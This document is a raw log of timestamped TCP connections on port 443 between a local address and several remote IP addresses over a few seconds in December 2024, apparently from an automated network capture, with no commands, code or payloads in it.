                                                                                              Dec 19, 2024 14:35:47.679991961 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:47.682085037 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:47.682149887 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:47.683322906 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:47.683407068 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:47.683546066 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:47.683552980 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:47.717256069 CET49672443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:47.778414965 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.129164934 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.129225969 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.129296064 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.129312992 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.129379034 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.129498959 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.132074118 CET49715443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.132085085 CET4434971569.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.284100056 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:48.284166098 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.284271955 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:48.284749031 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:48.284766912 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.292191982 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.292242050 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.292417049 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.292591095 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:48.292607069 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.421385050 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.421473980 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:48.426884890 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:48.426894903 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.427176952 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.429531097 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:48.429645061 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:48.429650068 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:48.429856062 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:48.475364923 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.094636917 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.094785929 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.094902992 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:49.095906019 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:49.095923901 CET4434971020.198.118.190192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.095943928 CET49710443192.168.2.620.198.118.190
                                                                                              Dec 19, 2024 14:35:49.501820087 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.502167940 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:49.502197981 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.503406048 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.503467083 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:49.508579016 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:49.508646011 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.508847952 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:49.508857012 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.540462971 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.540710926 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.540724039 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.542387009 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.542448997 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.542906046 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.542987108 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.543078899 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.543090105 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.561256886 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:49.585546970 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.982989073 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:49.983046055 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.983114958 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:49.983661890 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:49.983679056 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.994291067 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.994333982 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.994381905 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.994395971 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.994415998 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:49.994452953 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.995430946 CET49717443192.168.2.669.49.245.172
                                                                                              Dec 19, 2024 14:35:49.995444059 CET4434971769.49.245.172192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.055726051 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.056830883 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.056921959 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.057109118 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.057142973 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.057187080 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.057920933 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.060961008 CET44349702173.222.162.64192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.061078072 CET49702443192.168.2.6173.222.162.64
                                                                                              Dec 19, 2024 14:35:50.063963890 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.064120054 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.064127922 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.078602076 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.078666925 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.078695059 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.124120951 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.124133110 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.171920061 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.175514936 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.179299116 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.179495096 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.179502010 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.232588053 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.247667074 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.252593040 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.252665043 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.252697945 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.260499001 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.260564089 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.260575056 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.268235922 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.268311977 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.268323898 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.275990963 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.276062012 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.276078939 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.290977955 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.291057110 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.291074038 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.298774958 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.298846006 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.298861980 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.306484938 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.306747913 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.306763887 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.314233065 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.314441919 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.314457893 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.322155952 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.322364092 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.322390079 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.329256058 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.329320908 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.329338074 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.336452007 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.336508036 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.336523056 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.342700958 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.342763901 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.343413115 CET49716443192.168.2.6104.17.25.14
                                                                                              Dec 19, 2024 14:35:50.343442917 CET44349716104.17.25.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.556555033 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:50.556603909 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:50.556818008 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:50.557063103 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:50.557079077 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.061755896 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:51.061796904 CET44349725172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.061989069 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:51.062318087 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:51.062334061 CET44349725172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.684813023 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.685137033 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:51.685173035 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.686599970 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.686666012 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:51.687675953 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:51.687756062 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.738430977 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:51.738473892 CET44349719142.250.181.132192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.766892910 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.767219067 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:51.767268896 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.768177032 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.768248081 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:51.768593073 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:51.768655062 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.768767118 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:51.768781900 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:51.784715891 CET49719443192.168.2.6142.250.181.132
                                                                                              Dec 19, 2024 14:35:51.816025019 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.223469973 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.223499060 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.223664999 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.223726988 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.225425959 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.225495100 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.225509882 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.229938030 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.230025053 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.230037928 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.231806993 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.231875896 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.231888056 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.240169048 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.240247011 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.240257978 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.281054020 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.281084061 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.285294056 CET44349725172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.285528898 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.285542965 CET44349725172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.287276983 CET44349725172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.287345886 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.288470984 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.288470984 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.288551092 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.288554907 CET44349725172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.288738966 CET49725443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.288913965 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.288939953 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.289098024 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.289247036 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:52.289252043 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.326620102 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.430160046 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.434163094 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.434247017 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.434259892 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.442159891 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.442223072 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.442229986 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.450130939 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.450181961 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.450187922 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.458592892 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.458751917 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.458765030 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.466516018 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.466573954 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.466584921 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.474519968 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.474580050 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.474595070 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.482479095 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.482546091 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.482558966 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.496114969 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.496170998 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.496185064 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.503500938 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.503559113 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.503571987 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.545336962 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.545382023 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.591692924 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.623310089 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.625266075 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.625345945 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.625405073 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.630372047 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.630490065 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.630510092 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.630985975 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:52.631042004 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.631198883 CET49722443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:52.631232977 CET44349722104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.518084049 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.518385887 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:53.518414021 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.522914886 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.523008108 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:53.524108887 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:53.524306059 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.524319887 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:53.571331978 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.576750994 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:53.576771975 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:53.624687910 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.537856102 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.538732052 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.538788080 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.538811922 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.539876938 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.539954901 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.539961100 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.541007996 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.541069984 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.541074991 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.553966045 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.554039955 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.554045916 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.570399046 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.570461988 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.570467949 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.619524956 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.657095909 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.710796118 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.730060101 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.735845089 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.735954046 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.735966921 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.744169950 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.744220972 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.744227886 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.744457006 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.744596004 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.745541096 CET49726443192.168.2.6172.67.155.68
                                                                                              Dec 19, 2024 14:35:54.745553970 CET44349726172.67.155.68192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.897689104 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:54.897731066 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.897809029 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:54.898315907 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:54.898405075 CET44349734151.101.66.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.898665905 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:54.898710966 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:54.898714066 CET44349735104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.898891926 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:54.899034023 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:54.899065971 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.899194956 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:54.899240017 CET44349734151.101.66.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:54.899306059 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:54.899332047 CET44349735104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.181638002 CET44349735104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.181907892 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:56.181973934 CET44349735104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.183037043 CET44349735104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.183118105 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:56.183521986 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:56.183597088 CET44349735104.17.24.14192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.183676958 CET49735443192.168.2.6104.17.24.14
                                                                                              Dec 19, 2024 14:35:56.190589905 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.191317081 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:56.191334009 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.192511082 CET44349734151.101.66.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.192779064 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:56.192800999 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.192814112 CET44349734151.101.66.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.192873955 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:56.193830013 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:56.193917036 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.194272041 CET44349734151.101.66.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.194328070 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:56.194329977 CET49733443192.168.2.6104.18.94.41
                                                                                              Dec 19, 2024 14:35:56.194336891 CET44349733104.18.94.41192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.195717096 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:56.195800066 CET44349734151.101.66.137192.168.2.6
                                                                                              Dec 19, 2024 14:35:56.199645996 CET49734443192.168.2.6151.101.66.137
                                                                                              Dec 19, 2024 14:35:56.199655056 CET44349734151.101.66.137192.168.2.6
